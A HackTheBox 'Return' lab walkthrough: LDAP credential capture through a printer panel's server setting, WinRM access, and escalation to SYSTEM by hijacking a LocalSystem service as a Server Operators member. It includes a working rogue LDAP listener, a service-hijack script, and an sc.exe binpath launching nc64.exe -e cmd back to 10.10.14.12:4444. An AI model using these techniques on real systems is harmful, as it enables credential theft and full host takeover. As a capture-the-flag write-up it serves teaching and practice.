HackTheBox : Return Walkthrough
Operating System : Windows
Difficulty : Easy
First, start reconnaissance with an nmap scan of all TCP ports on the target to find which services are exposed.
Next, run an nmap service and version scan (-sV) against the open ports. The LDAP service banner reveals the domain name: return.local.
Add the target machine’s IP address (10.10.11.108) and domain (return.local) to the /etc/hosts file
Next, navigate to the website http://return.local, where you will find the HTB Printer Admin Panel.
Next, explore the site and find a ‘Settings’ page (http://return.local/settings.php) that configures the printer’s LDAP connection rather than a user login. The page shows a server address of printer.return.local, port 389 (LDAP), the username svc-printer, and a password field that is masked with asterisks; the credentials are stored server-side in the web application.
Next, view the page source hoping to find the stored password, but the field is masked there as well, so the password never reaches the browser and cannot be read from the client side.
Next, use Burp Suite to intercept the request the settings page sends when it is saved. The request body contains only the server address, and the application uses its stored username and password to authenticate against whatever server is supplied. An attacker can therefore change the server address to a host they control and capture the credentials the printer panel uses to bind to LDAP.
Use the Responder tool to listen for incoming traffic, binding it to the VPN interface tun0 (sudo responder -I tun0).
In the settings panel, change the server address to connect to the attacker’s server (in this example, 10.10.14.12), then click ‘Update’.
On the attacker’s Responder, the LDAP credentials are captured. Because the panel performs an LDAP simple bind on port 389 without TLS, the password arrives in cleartext and needs no cracking.
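To make clear what Responder captured in the exchange above, here is a minimal rogue LDAP listener written for this walkthrough. It is an added example, not code from the original post or from Responder. It decodes the BER-encoded BindRequest the printer panel sends, which carries the bind name and the password as plain octet strings, and prints them. The sample packet at the bottom is constructed with a made-up credential so the decoder can be exercised offline; the function names are mine.

```powershell
# Added example: rogue LDAP listener that captures a cleartext simple bind.
# The LDAPMessage on the wire is:
#   SEQUENCE { messageID INTEGER, [APPLICATION 0] BindRequest {
#       version INTEGER, name OCTET STRING, authentication [0] simple OCTET STRING } }

function Read-BerLength {
    # Decode a BER length at $Pos: short form (<0x80) or long form (0x81 xx, 0x82 xx xx, ...).
    param([byte[]]$Buf, [ref]$Pos)
    $first = [int]$Buf[$Pos.Value]; $Pos.Value++
    if ($first -lt 0x80) { return $first }
    $n = $first -band 0x7F
    $len = 0
    for ($i = 0; $i -lt $n; $i++) { $len = $len * 256 + [int]$Buf[$Pos.Value]; $Pos.Value++ }
    return $len
}

function Read-BerTlv {
    # Read one tag-length-value element at $Pos and advance past it.
    param([byte[]]$Buf, [ref]$Pos)
    $tag = [int]$Buf[$Pos.Value]; $Pos.Value++
    $len = Read-BerLength $Buf $Pos
    $val = New-Object byte[] $len
    if ($len -gt 0) { [Array]::Copy($Buf, $Pos.Value, $val, 0, $len) }
    $Pos.Value += $len
    return @{ Tag = $tag; Value = $val }
}

function ConvertFrom-LdapBindRequest {
    # Parse a BindRequest PDU and return message id, version, bind name and password.
    param([byte[]]$Packet)
    $pos = 0
    $msg = Read-BerTlv $Packet ([ref]$pos)
    if ($msg.Tag -ne 0x30) { throw "not an LDAPMessage SEQUENCE" }
    $p = 0
    $id = Read-BerTlv $msg.Value ([ref]$p)
    $op = Read-BerTlv $msg.Value ([ref]$p)
    if ($op.Tag -ne 0x60) { throw ("not a BindRequest (protocolOp tag 0x{0:X2})" -f $op.Tag) }
    $q = 0
    $ver  = Read-BerTlv $op.Value ([ref]$q)
    $name = Read-BerTlv $op.Value ([ref]$q)
    $auth = Read-BerTlv $op.Value ([ref]$q)
    if ($auth.Tag -ne 0x80) { throw ("not a simple bind (authentication tag 0x{0:X2}, probably SASL)" -f $auth.Tag) }
    $mid = 0; foreach ($b in $id.Value) { $mid = $mid * 256 + [int]$b }
    $utf8 = [System.Text.Encoding]::UTF8
    return [pscustomobject]@{
        MessageId = $mid
        Version   = [int]$ver.Value[0]
        Name      = $utf8.GetString($name.Value)
        Password  = $utf8.GetString($auth.Value)   # cleartext: simple bind, no TLS
    }
}

function Start-LdapCaptureListener {
    # Accept connections, decode the first PDU as a BindRequest and print the credential.
    # No BindResponse is sent back; the client just sees a failed bind, the password is already logged.
    param([int]$Port = 389, [System.Net.IPAddress]$Address = [System.Net.IPAddress]::Any)
    $listener = New-Object System.Net.Sockets.TcpListener($Address, $Port)
    $listener.Start()
    Write-Host "[*] LDAP capture listening on ${Address}:$Port (Ctrl+C to stop)"
    try {
        while ($true) {
            $client = $listener.AcceptTcpClient()
            $peer = $client.Client.RemoteEndPoint
            $buf = New-Object byte[] 4096
            $n = $client.GetStream().Read($buf, 0, $buf.Length)
            try {
                if ($n -le 0) { throw "connection closed without data" }
                $bind = ConvertFrom-LdapBindRequest ([byte[]]$buf[0..($n - 1)])
                Write-Host ("[+] {0} LDAP simple bind: name='{1}' password='{2}'" -f $peer, $bind.Name, $bind.Password)
            } catch {
                Write-Host ("[-] {0}: {1}" -f $peer, $_.Exception.Message)
            } finally { $client.Close() }
        }
    } finally { $listener.Stop() }
}

function New-BerTlv {
    # Encoder used only to build the offline sample; short-form length (value under 128 bytes).
    param([int]$Tag, [byte[]]$Value)
    if ($Value.Length -ge 128) { throw "sample builder supports values under 128 bytes only" }
    return [byte[]](@([byte]$Tag, [byte]$Value.Length) + $Value)
}

function New-LdapSimpleBindRequest {
    # Build a version-3 simple BindRequest; small positive message ids only (single-byte INTEGER).
    param([int]$MessageId, [string]$Name, [string]$Password)
    $utf8 = [System.Text.Encoding]::UTF8
    $op = New-BerTlv 0x60 ((New-BerTlv 0x02 @(3)) + (New-BerTlv 0x04 $utf8.GetBytes($Name)) + (New-BerTlv 0x80 $utf8.GetBytes($Password)))
    return New-BerTlv 0x30 ((New-BerTlv 0x02 @($MessageId)) + $op)
}

# Offline demonstration with a constructed packet (made-up credential, not the box's):
$sample = New-LdapSimpleBindRequest -MessageId 1 -Name 'return\svc-printer' -Password 'NotTheRealPassword'
Write-Host ("Raw BindRequest: " + (($sample | ForEach-Object { '{0:X2}' -f [int]$_ }) -join ' '))
ConvertFrom-LdapBindRequest $sample | Format-List
# Live use on the attacker host (binding port 389 needs root/Administrator), then point the
# panel's Server Address at this host, exactly as done with Responder above:
# Start-LdapCaptureListener -Port 389
```

The decoder deliberately refuses SASL binds (authentication tag other than 0x80) so that a GSSAPI or NTLM bind is not misreported as a password; the panel on this box uses a simple bind, which is the only case where the secret itself is on the wire.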
Next, use netexec (nxc winrm) to test the captured svc-printer credentials against the target over WinRM. The connection succeeds and netexec reports ‘Pwn3d!’, which for the WinRM protocol means the account is allowed to open a remote PowerShell session, not that it is an administrator.
Next, use the Evil-WinRM tool along with the credentials (username and password) of the svc-printer user to connect to the target machine, and you will find that the connection is successful.
Read the user flag from the user.txt file.
Next, examine the group memberships of the svc-printer user (whoami /groups) and find that it belongs to the built-in ‘Server Operators’ group. Members of this group can reconfigure services on the server, including changing the binary path a service is started from, and can start or stop services.
Members of the Server Operators group can sign in to a server interactively, create and delete network shared resources, start and stop services, back up and restore files, format the hard disk drive of the computer, and shut down the computer.
Next, review the services on the target machine, focusing on those that run as LocalSystem, because a service hijacked in that context yields a SYSTEM shell. In this lab, ‘VGAuthService’ (the VMware Guest Authentication Service) is selected.
Upload nc64.exe to the target machine with Evil-WinRM’s upload command, placing it in C:\Users\svc-printer\Desktop (the path used in the service command below).
Next, use sc.exe to set the service’s binary path (binpath) to a command that runs cmd.exe, which in turn launches nc64.exe and connects back to the attacker (10.10.14.12) on port 4444; the -e cmd option makes Netcat hand the attacker a cmd.exe prompt once connected. Inside the Evil-WinRM PowerShell session, type sc.exe rather than sc, because sc is a PowerShell alias for Set-Content, and keep the space after binpath=, which sc.exe’s argument parser requires.
sc.exe config VGAuthService binpath= "C:\windows\system32\cmd.exe /c C:\Users\svc-printer\Desktop\nc64.exe -e cmd 10.10.14.12 4444"
Next, query the service configuration (sc.exe qc VGAuthService) to confirm that BINARY_PATH_NAME now points at the command above and that SERVICE_START_NAME is LocalSystem, so the command will run as SYSTEM when the service is started.
Next, on the attacker’s machine, use the nc command to create a listener to await the connection from the target machine on port 4444.
Next, stop the VGAuthService service.
Check the status of the VGAuthService again to ensure that it has stopped running.
Next, start the VGAuthService service so that the Service Control Manager runs the binary path that was set. Because that command is not a real service executable, sc.exe start will eventually report error 1053 (the service did not respond in a timely fashion); this is expected, and the reverse shell has already connected by then.
On the attacker’s machine, a reverse shell from the target machine is established with nt authority\system privileges, the highest level of access on the Windows host.
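The service-hijack procedure above (find a LocalSystem service, change its binpath, verify, stop and start it) gathered into one PowerShell script for the Evil-WinRM session. This is an added example written for this page, not code from the original walkthrough. It assumes nc64.exe was uploaded to C:\Users\svc-printer\Desktop and that the attacker listener is 10.10.14.12:4444, as in the text; the function names are mine. It goes a little beyond the text: it checks for the Server Operators SID before touching anything, lists every LocalSystem service rather than only VGAuthService, and records the original binary path so the service can be restored afterwards.

```powershell
# Added example: Server Operators service binpath hijack, run from the Evil-WinRM prompt.
# Assumptions (from the walkthrough): nc64.exe at C:\Users\svc-printer\Desktop, listener 10.10.14.12:4444.

function Test-ServerOperator {
    # True if the current token carries the built-in Server Operators group (SID S-1-5-32-549).
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    return [bool]($id.Groups | Where-Object { $_.Value -eq 'S-1-5-32-549' })
}

function Get-LocalSystemService {
    # Services that run as LocalSystem. Server Operators may reconfigure and start/stop any
    # service, so each of these is a candidate for a SYSTEM shell.
    Get-CimInstance Win32_Service |
        Where-Object { $_.StartName -eq 'LocalSystem' } |
        Select-Object Name, State, StartMode, PathName
}

function Invoke-ServiceBinPathHijack {
    # Point $Name at $Command, restart the service, and return the original binpath for restoration.
    param(
        [Parameter(Mandatory)][string]$Name,       # e.g. VGAuthService
        [Parameter(Mandatory)][string]$Command,    # what the SCM should spawn as SYSTEM
        [int]$StopTimeoutSeconds = 30
    )
    $svc = Get-CimInstance Win32_Service -Filter "Name='$Name'"
    if (-not $svc) { throw "service '$Name' not found" }
    if ($svc.StartName -ne 'LocalSystem') { throw "'$Name' runs as $($svc.StartName), not LocalSystem" }
    $original = $svc.PathName
    Write-Host "[*] original binpath: $original"

    # sc.exe, not sc: in PowerShell 'sc' is an alias for Set-Content.
    # PowerShell quotes $Command as one argument; the space after 'binpath=' is required by sc.exe.
    & sc.exe config $Name binpath= $Command | Out-Null
    $check = (Get-CimInstance Win32_Service -Filter "Name='$Name'").PathName
    if ($check -ne $Command) { throw "binpath did not change (got: $check)" }
    Write-Host "[+] binpath now: $check"

    if ($svc.State -eq 'Running') {
        & sc.exe stop $Name | Out-Null
        # Wait until the SCM actually reports Stopped before starting again.
        $deadline = (Get-Date).AddSeconds($StopTimeoutSeconds)
        while ((Get-Service $Name).Status -ne 'Stopped' -and (Get-Date) -lt $deadline) { Start-Sleep -Seconds 1 }
        if ((Get-Service $Name).Status -ne 'Stopped') { throw "'$Name' did not stop within $StopTimeoutSeconds s" }
    }
    # Starting runs $Command as SYSTEM. sc.exe reports error 1053 after its timeout because the
    # command is not a real service binary; the reverse shell has already connected by then.
    $out = & sc.exe start $Name 2>&1
    Write-Host ($out -join "`n")
    return $original
}

function Restore-ServiceBinPath {
    # Put the original binpath back so the service is not left broken on the host.
    param([Parameter(Mandatory)][string]$Name, [Parameter(Mandatory)][string]$Original)
    & sc.exe config $Name binpath= $Original | Out-Null
    return (Get-CimInstance Win32_Service -Filter "Name='$Name'").PathName
}

# Read-only checks, safe to run as-is:
Write-Host ("Server Operators member: {0}" -f (Test-ServerOperator))
Get-LocalSystemService | Format-Table -AutoSize

# The hijack itself (modifies the service; run only with the Netcat listener already up):
# $orig = Invoke-ServiceBinPathHijack -Name VGAuthService `
#     -Command 'C:\windows\system32\cmd.exe /c C:\Users\svc-printer\Desktop\nc64.exe -e cmd 10.10.14.12 4444'
# Restore-ServiceBinPath -Name VGAuthService -Original $orig
```

The stop-wait loop matters: issuing start while the SCM still reports STOP_PENDING fails silently, which is why the walkthrough checks the service status between the stop and the start.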
Read the root flag from the root.txt file.